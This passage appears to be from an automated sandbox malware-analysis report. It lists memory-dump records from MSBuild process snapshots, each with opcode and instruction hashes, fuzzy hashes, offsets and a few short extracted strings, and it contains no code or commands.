                                                                                                                      • Instruction ID: 1c675366bb6f71181bcbde9dc70d3f62d8e0eb514466c787e8c5b2130378436b
                                                                                                                      • Opcode Fuzzy Hash: 873e1b2ae6cb485206447e6e5870139c56032881717ec9865c0b70c267b572d9
                                                                                                                      • Instruction Fuzzy Hash: 2C01A7767201608FC7195F3DE855C1A7FEA9F8AA2131A00F9E845DB375CA21EC028BA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b570b7c472767ce48c458af3ab8069b099f65d4c342c33f9b6cd726e1b93522
                                                                                                                      • Instruction ID: ff107f0b621ff9c34420a62f9dd23e1b581834d178559405cc23f822922e80df
                                                                                                                      • Opcode Fuzzy Hash: 0b570b7c472767ce48c458af3ab8069b099f65d4c342c33f9b6cd726e1b93522
                                                                                                                      • Instruction Fuzzy Hash: BCF044767105208FC718AF3DE444D1A77EAAF89A2531601B9E805DB334CA31EC418BA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5c8ad6720106eaf516e1fa146da679f591cffed99032b64a66e6fc1d56b392ef
                                                                                                                      • Instruction ID: 582aa4f0f5be97e7c8d4b968dd9e3c273695be65cdb9cdd141f03923d05a1486
                                                                                                                      • Opcode Fuzzy Hash: 5c8ad6720106eaf516e1fa146da679f591cffed99032b64a66e6fc1d56b392ef
                                                                                                                      • Instruction Fuzzy Hash: 9301D635B083015FD71C5BB4E428BA93B61AB85754F0405BDE506C33D4DB69DC81C752
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e460ccef0d854e83eda08726d17049a4f9e214fc173dcf41176d6117d75699ff
                                                                                                                      • Instruction ID: b5c3676a5dd6f5ab39b597078349e214680ac938e44de86013aa385ce9082366
                                                                                                                      • Opcode Fuzzy Hash: e460ccef0d854e83eda08726d17049a4f9e214fc173dcf41176d6117d75699ff
                                                                                                                      • Instruction Fuzzy Hash: C1F0BB39B0431047D71C67B8E428B6A3B56A788B44F04057CBA0AC33C4DF65DC81C792
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1d21b33786c39f515797fb5fe38ecf59c89225e808f019b453fd295368e9e17
                                                                                                                      • Instruction ID: 71951bc153c8507c151045ed7d706542ca66f32cc31b80b1f149b72e85125368
                                                                                                                      • Opcode Fuzzy Hash: e1d21b33786c39f515797fb5fe38ecf59c89225e808f019b453fd295368e9e17
                                                                                                                      • Instruction Fuzzy Hash: A3F02471E04204DFCB09CBB8E8545ECBFB6EF89304B0480EAE00AD7275E7329A46CB40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ca376ea20df0cac041e48352e6a586f8e6d9e7813ca16264fd13a88485f00127
                                                                                                                      • Instruction ID: da52379abb18450cf61236df084e01b09a5e0ab68d17f532916991d7130c2675
                                                                                                                      • Opcode Fuzzy Hash: ca376ea20df0cac041e48352e6a586f8e6d9e7813ca16264fd13a88485f00127
                                                                                                                      • Instruction Fuzzy Hash: C8E09B393411049FD314DF69F45485ABBEAEFC97517104039A90BC7359CE365C41C760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dd27d7e5cd934d4237d9857836641215e2f7cca6dd231cdbd1c36741592e49ae
                                                                                                                      • Instruction ID: 41726d9095f05261b1ef90bec5c12284db5fb0271490b2308f73fc3dea109cf8
                                                                                                                      • Opcode Fuzzy Hash: dd27d7e5cd934d4237d9857836641215e2f7cca6dd231cdbd1c36741592e49ae
                                                                                                                      • Instruction Fuzzy Hash: E5F01778641205CFCB18EF74D198A6877B1EF88704F1144ACE40A9B3A5CB75EC41CF01
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c7b08a01391421e3ddcba5c975735e096f7b07d1bae1462cdaefb08ff46fd426
                                                                                                                      • Instruction ID: 5375252d8084ab94f2fba81c46e035b726074c81e5b3aa25907eac9b54d9ff5b
                                                                                                                      • Opcode Fuzzy Hash: c7b08a01391421e3ddcba5c975735e096f7b07d1bae1462cdaefb08ff46fd426
                                                                                                                      • Instruction Fuzzy Hash: 89E0D83054918C9FC705DBB4E9A24AD7FB1DF0A108B1044F6C848E7222E6305E059741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2af3541a5dd358f251d1834d70750c9b7ff1ef96c263d05cfe569baa32c5805f
                                                                                                                      • Instruction ID: 206e6780b71215845cfd57f9c0e09d27bb85ef8565cd2fe2f464e25f9caed763
                                                                                                                      • Opcode Fuzzy Hash: 2af3541a5dd358f251d1834d70750c9b7ff1ef96c263d05cfe569baa32c5805f
                                                                                                                      • Instruction Fuzzy Hash: 85E02E3252E3400FC70A5B39B8006863BD88B2B620F2108FBF888C7312E3409E0083D6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 88bee24ff4bb67d5ae996bfde4477bdc1fb8cdb3064259f5c738d44b5ecb1522
                                                                                                                      • Instruction ID: 0c110f897ae85fd132824b7efedf3203049518221dc7aa8ffa5486f1beff74e5
                                                                                                                      • Opcode Fuzzy Hash: 88bee24ff4bb67d5ae996bfde4477bdc1fb8cdb3064259f5c738d44b5ecb1522
                                                                                                                      • Instruction Fuzzy Hash: 83D05E74A0110CEFCB14EFB8EA4155EBBF9EB48608B1081B9D408E7304FB31AF009B80
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$LR^q$LR^q$LR^q
                                                                                                                      • API String ID: 0-3320307730
                                                                                                                      • Opcode ID: b19e5151248f99a74241e6845e93cd25adf27b7316052fc22f8323e51bd5e798
                                                                                                                      • Instruction ID: be90436771fbffeeab3e39d26e6255240c151fe07e5083a493a2b1cd18e6b63d
                                                                                                                      • Opcode Fuzzy Hash: b19e5151248f99a74241e6845e93cd25adf27b7316052fc22f8323e51bd5e798
                                                                                                                      • Instruction Fuzzy Hash: 0EE19E30B042069FDB15CF68C984BAEB7B2BFC9304F148669D5059B2A6DB78DD42CB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0bed8c0ffc82563b4b91dca4da2102419ea1eba5572a0530d52f257018179344
                                                                                                                      • Instruction ID: 4138b808a0a0e460174bda2e17307fe3acc7df945b9b379fbb3615ae008241ff
                                                                                                                      • Opcode Fuzzy Hash: 0bed8c0ffc82563b4b91dca4da2102419ea1eba5572a0530d52f257018179344
                                                                                                                      • Instruction Fuzzy Hash: C303AA30A40709DFDB11DF64CD48BA9B7BAEF89700F1186D5E5087B2A5CBB5AAC1CB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 47f17f4c11ec2d16a65e0075220d318662156951c9dd0f5692db689a1a1c67a3
                                                                                                                      • Instruction ID: 69789b81162597b6d2411e77fd45d32c0f28c3e7039807544849032493ef21bc
                                                                                                                      • Opcode Fuzzy Hash: 47f17f4c11ec2d16a65e0075220d318662156951c9dd0f5692db689a1a1c67a3
                                                                                                                      • Instruction Fuzzy Hash: C142AE30700A05DFDB28DB64C988B6EB7F2BFC6704F188629D4499B295DB78EC81CB51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (bq$D@u$Hbq
                                                                                                                      • API String ID: 0-1671960856
                                                                                                                      • Opcode ID: f0260e505244ce699c2fc4517e7f3a70dbd917ca14f007e64f16210f1736f39f
                                                                                                                      • Instruction ID: 2c73f639383a90b94d29dfaf78386a4c1bf274021bdefeef92fa832ecb166571
                                                                                                                      • Opcode Fuzzy Hash: f0260e505244ce699c2fc4517e7f3a70dbd917ca14f007e64f16210f1736f39f
                                                                                                                      • Instruction Fuzzy Hash: 2851BE31E002489FDB04DBB998146EEBFB2EFD6310F14857AD449E7291EB385A05CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$$^q
                                                                                                                      • API String ID: 0-355816377
                                                                                                                      • Opcode ID: dbe9e6527f143acbca0559929f6f273398d91cccd96c1512ca3251e6af27289a
                                                                                                                      • Instruction ID: 8f5aa4ab5c222ac9b26275e77f872d1f0a0f839c5d910391986e541f7b7f7574
                                                                                                                      • Opcode Fuzzy Hash: dbe9e6527f143acbca0559929f6f273398d91cccd96c1512ca3251e6af27289a
                                                                                                                      • Instruction Fuzzy Hash: 5241BF34B00209DFD709DF68D84499A7BF6EF85305B10C2A9E409DB379EB789D06CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `Q^q
                                                                                                                      • API String ID: 0-1948671464
                                                                                                                      • Opcode ID: b68344283f16c40d20d441f1ce75813ae19b77771907eb95e4fe5e69ea91ef71
                                                                                                                      • Instruction ID: 5c1d46af9e108cbcf68f8bd1d5cd8d4198aaad586da1d44104a276569af2cab9
                                                                                                                      • Opcode Fuzzy Hash: b68344283f16c40d20d441f1ce75813ae19b77771907eb95e4fe5e69ea91ef71
                                                                                                                      • Instruction Fuzzy Hash: E021CD70A083969FDB05DBB5C9547EE7BF1AF8A300F24013AD841EB391DB388944CBA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q
                                                                                                                      • API String ID: 0-388095546
                                                                                                                      • Opcode ID: 556ddc09ae0f98a092163d77ef0834cd1ac139e9f5a4672f83bc1426838ce123
                                                                                                                      • Instruction ID: d5fe404b452df3d3035efa5ffa8d6ab22cc255e19fba6516bca797c4efe78f28
                                                                                                                      • Opcode Fuzzy Hash: 556ddc09ae0f98a092163d77ef0834cd1ac139e9f5a4672f83bc1426838ce123
                                                                                                                      • Instruction Fuzzy Hash: CE81AD30B017059FCB25DB68CA44B6AB7F2FFC6315F188569D8099B296DB39EC42CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP^q
                                                                                                                      • API String ID: 0-2862610199
                                                                                                                      • Opcode ID: 19d924c51cc35c5aa1569de3c1137e60a43cb5f0a61f21f9c55c52b97865f44c
                                                                                                                      • Instruction ID: bc9d79c31ede0ebfe97c2b890c605a03fe866531d473aeee9a917deb95487bce
                                                                                                                      • Opcode Fuzzy Hash: 19d924c51cc35c5aa1569de3c1137e60a43cb5f0a61f21f9c55c52b97865f44c
                                                                                                                      • Instruction Fuzzy Hash: 3141C271B00205CFDB18EF78C458A6DB7B2AF86B14F5145A9D40A9F362DB39DC06CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q
                                                                                                                      • API String ID: 0-1614139903
                                                                                                                      • Opcode ID: 47173bf88886e4f07505f2520307596b19e8f1ae16305f811ecb148390b00e07
                                                                                                                      • Instruction ID: 7202cf40ecb0f68a7cec59caa0c24891c957fefd9ab8c1d5c8bf32ff91c0c278
                                                                                                                      • Opcode Fuzzy Hash: 47173bf88886e4f07505f2520307596b19e8f1ae16305f811ecb148390b00e07
                                                                                                                      • Instruction Fuzzy Hash: 1C418030A00208DFCB05EFB8E55579EBBF2FF84304F108565E109AB365DB789949CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP^q
                                                                                                                      • API String ID: 0-2862610199
                                                                                                                      • Opcode ID: 52a54c914ce766702ddbb648d74ededdb47e279137f8a12698716e27937e7428
                                                                                                                      • Instruction ID: ca0577dc3057114f01751099719de8b3d4603ad7c2fffbfb4419c003ce03a2df
                                                                                                                      • Opcode Fuzzy Hash: 52a54c914ce766702ddbb648d74ededdb47e279137f8a12698716e27937e7428
                                                                                                                      • Instruction Fuzzy Hash: EC215970B00115CFCB48EF78D58886D7BB2AF49714B2044A9E80ADB3A1DB39DC02CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP^q
                                                                                                                      • API String ID: 0-2862610199
                                                                                                                      • Opcode ID: 6207a3b242a4b225d68108e7d91ef9406bcd050b9997164db6be6356467f668b
                                                                                                                      • Instruction ID: 89b422336ede2408f89e85d7d1d346206e862c1fd9cc08fc8c8cf3a2f5bcc1e0
                                                                                                                      • Opcode Fuzzy Hash: 6207a3b242a4b225d68108e7d91ef9406bcd050b9997164db6be6356467f668b
                                                                                                                      • Instruction Fuzzy Hash: 5E1190747401018FC709EF74E99896D7BB2AF85B18B114199E40ACF3B2DB39EC06CBA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `Q^q
                                                                                                                      • API String ID: 0-1948671464
                                                                                                                      • Opcode ID: 6340e521b4444dc194131392004d8933ce9c9657524fac4bb42de9d65a7604cf
                                                                                                                      • Instruction ID: 5105cd4eb1330878821fb2cac85d2d737c2a4d74c540cece0089bde11ca4dcf8
                                                                                                                      • Opcode Fuzzy Hash: 6340e521b4444dc194131392004d8933ce9c9657524fac4bb42de9d65a7604cf
                                                                                                                      • Instruction Fuzzy Hash: 4E119D30A042598BDB04EBB5C9056AE7BF2AFC9301F144129D505BB394DF3C9D84CBA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 0-3372436214
                                                                                                                      • Opcode ID: 002e6fe26809afe39a95c56632581fe2d880ac290fd93b29addcb013ce2cbe0c
                                                                                                                      • Instruction ID: ca6ca6406af004f22b56e7bc382569c30982532db3cccf143867bfb08b0ff6b9
                                                                                                                      • Opcode Fuzzy Hash: 002e6fe26809afe39a95c56632581fe2d880ac290fd93b29addcb013ce2cbe0c
                                                                                                                      • Instruction Fuzzy Hash: 2611B1317047008FC314DF29D958B56BBE6ABC1305F05C6B9C059876A6D7B8E846CB51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dc247885c8cf509024f2b142442ce9131a6e1acdb75212fddb0132c96880869c
                                                                                                                      • Instruction ID: 8a3978f493cea41e452f46dc86f4be67496238d7a3b68f0cee15ddc007aa1436
                                                                                                                      • Opcode Fuzzy Hash: dc247885c8cf509024f2b142442ce9131a6e1acdb75212fddb0132c96880869c
                                                                                                                      • Instruction Fuzzy Hash: 5EA19E71A00208DFDB14DFE5D954AEEBBFAFF89304F14812AE505AB290DB789946CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 430c234688a23b263b146451b4d9224bc8eb758c766a69ca53a9e3fe1c4847d0
                                                                                                                      • Instruction ID: 98a8a0317aba3ab275dd42deb641935f8a5208ef21f9a6ebd2338b4c7e5fe758
                                                                                                                      • Opcode Fuzzy Hash: 430c234688a23b263b146451b4d9224bc8eb758c766a69ca53a9e3fe1c4847d0
                                                                                                                      • Instruction Fuzzy Hash: DBA16C30200645CFC715DF28C584A69BBF6FFC6300B4AC6A9D4598B666E775FD88CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf0824caa73820d94c3a413f37b38f615edcb76b9ba0b6cb2e70049835741cce
                                                                                                                      • Instruction ID: ea6a0ffe8b01884d64d821ecebbffef59604a6b815af483d8285cfbbd7f864ea
                                                                                                                      • Opcode Fuzzy Hash: bf0824caa73820d94c3a413f37b38f615edcb76b9ba0b6cb2e70049835741cce
                                                                                                                      • Instruction Fuzzy Hash: B641AE30A043049FC715DF29E948A8AFBF6EFC5304F01C669D4099B266D774EC4ACB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 689205b7e9b016f04af54b80c6e0182d85acac77b4232bc0125ff1558a53ed88
                                                                                                                      • Instruction ID: b9d013267a3bc203200661cc9b44486795c8435f3a335896c943306b2b6e04e4
                                                                                                                      • Opcode Fuzzy Hash: 689205b7e9b016f04af54b80c6e0182d85acac77b4232bc0125ff1558a53ed88
                                                                                                                      • Instruction Fuzzy Hash: DF317070A043849FC7269B35981476E7FF5DFCB720F0941AAE544CB252DE389D14C791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c7d0903da711a6e103e003a950689a5cee12682eb56cfa8bb22482d1762579fe
                                                                                                                      • Instruction ID: 3eaa302e4e714d67514a968915326a7c9b505903778cb95a103f049dd08381c3
                                                                                                                      • Opcode Fuzzy Hash: c7d0903da711a6e103e003a950689a5cee12682eb56cfa8bb22482d1762579fe
                                                                                                                      • Instruction Fuzzy Hash: 6D315975B00104CFCB48EF78D58896D77F6BB89724B248669E416DB3A5CB78DC06CB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6ad033659349c99f62932e111cffa2e891854ade8fffc635bf8ac045223ff53d
                                                                                                                      • Instruction ID: 6cf428eae20f9cc7d9919313ae76ec20c68ac484e4cf765e4415fd81ec4d9500
                                                                                                                      • Opcode Fuzzy Hash: 6ad033659349c99f62932e111cffa2e891854ade8fffc635bf8ac045223ff53d
                                                                                                                      • Instruction Fuzzy Hash: FD21B130600708CFD7149F69D858BA9BBF6AF86311F0586AAE405CB2A2D77CDE40CB60
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e43b6b7046496e2088127afcfbad07224accf73beb65ec157104a1cfadeb65fd
                                                                                                                      • Instruction ID: cabdc6d027578f9fff693cff832f23bcac856a78766b7e9f7cd92e57d0c7cf81
                                                                                                                      • Opcode Fuzzy Hash: e43b6b7046496e2088127afcfbad07224accf73beb65ec157104a1cfadeb65fd
                                                                                                                      • Instruction Fuzzy Hash: C101D4717052608FC7265B38E90491A7FF5AF8AA1531A01EAE845EF376CA31DC02CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4b6c412636c608c04ed55b88e83e53c9cc7f51994c8c99b9a0e78255e3e4b256
                                                                                                                      • Instruction ID: eef887ecb205484d4bc81484b0f865b0ac2ead33f2c6cba597f7e54bcb54698d
                                                                                                                      • Opcode Fuzzy Hash: 4b6c412636c608c04ed55b88e83e53c9cc7f51994c8c99b9a0e78255e3e4b256
                                                                                                                      • Instruction Fuzzy Hash: 79F04935304340AFC3129B25E45476A3BE6DBCEA21F088165E844CB251CA38DD01C390
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_7a0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8948e045a736e81f6b213931a9c91986cb04bc01fecd071b8ab51d9242b9444b
                                                                                                                      • Instruction ID: 416eca3456c5fed2e98f06b63dbd1c7959f85d1e03eb37089762beb6bea6ee07
                                                                                                                      • Opcode Fuzzy Hash: 8948e045a736e81f6b213931a9c91986cb04bc01fecd071b8ab51d9242b9444b
                                                                                                                      • Instruction Fuzzy Hash: 0FF068767105308FC718AF3DF54481A7BE9EF89A2531501B9E805EB334CE71EC018BA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2373291813.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
